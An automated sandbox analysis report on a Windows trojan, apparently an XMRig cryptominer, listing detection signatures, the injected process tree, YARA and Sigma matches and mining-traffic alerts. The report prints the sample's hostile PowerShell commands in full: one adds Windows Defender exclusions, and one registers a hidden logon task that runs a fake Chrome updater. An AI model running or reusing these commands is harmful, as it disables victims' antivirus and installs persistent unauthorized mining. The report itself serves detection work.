Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ylVAEHbMLf.exe

Overview

General Information

Sample name:ylVAEHbMLf.exe
renamed because original name is a hash value
Original sample name:3fb477ee2214bf2d4ed7df2d23f159e8.exe
Analysis ID:1528506
MD5:3fb477ee2214bf2d4ed7df2d23f159e8
SHA1:836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256:508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • ylVAEHbMLf.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\ylVAEHbMLf.exe" MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8)
    • dialer.exe (PID: 5796 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • updater.exe (PID: 6184 cmdline: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8)
          • dialer.exe (PID: 6252 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
            • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2268 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2388 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2872 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6996 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
      0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
        0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
          00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x5153a8:$a1: mining.set_target
            • 0x510b88:$a2: XMRIG_HOSTNAME
            • 0x512680:$a3: Usage: xmrig [OPTIONS]
            • 0x510b60:$a4: XMRIG_VERSION
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            21.2.updater.exe.7ff750fc1860.5.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              21.2.updater.exe.7ff750fc1860.5.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x4ceb48:$a1: mining.set_target
              • 0x4ca328:$a2: XMRIG_HOSTNAME
              • 0x4cbe20:$a3: Usage: xmrig [OPTIONS]
              • 0x4ca300:$a4: XMRIG_VERSION
              21.2.updater.exe.7ff750fc1860.5.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              21.2.updater.exe.7ff750fc1860.5.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x4d5080:$s1: %s/%s (Windows NT %lu.%lu
              • 0x4d58a8:$s3: \\.\WinRing0_
              • 0x4cdda8:$s4: pool_wallet
              • 0x4c9bb0:$s5: cryptonight
              • 0x4c9bc0:$s5: cryptonight
              • 0x4c9bd0:$s5: cryptonight
              • 0x4c9be0:$s5: cryptonight
              • 0x4c9bf8:$s5: cryptonight
              • 0x4c9c08:$s5: cryptonight
              • 0x4c9c18:$s5: cryptonight
              • 0x4c9c30:$s5: cryptonight
              • 0x4c9c40:$s5: cryptonight
              • 0x4c9c58:$s5: cryptonight
              • 0x4c9c70:$s5: cryptonight
              • 0x4c9c80:$s5: cryptonight
              • 0x4c9c90:$s5: cryptonight
              • 0x4c9ca0:$s5: cryptonight
              • 0x4c9cb8:$s5: cryptonight
              • 0x4c9cd0:$s5: cryptonight
              • 0x4c9ce0:$s5: cryptonight
              • 0x4c9cf0:$s5: cryptonight
              21.2.updater.exe.7ff750f60000.4.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 11 entries

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, ProcessId: 2872, ProcessName: powershell.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, ProcessId: 2872, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7000, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7000, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 5796, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7000, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T00:27:19.040132+020020362892Crypto Currency Mining Activity Detected192.168.2.4517341.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T00:26:50.151198+020028269302Crypto Currency Mining Activity Detected192.168.2.44973645.76.89.7080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: ylVAEHbMLf.exeAvira: detected
                Source: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmpAvira: detection malicious, Label: HEUR/AGEN.1362356
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeReversingLabs: Detection: 55%
                Source: ylVAEHbMLf.exeReversingLabs: Detection: 55%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJoe Sandbox ML: detected
                Source: ylVAEHbMLf.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: ylVAEHbMLf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
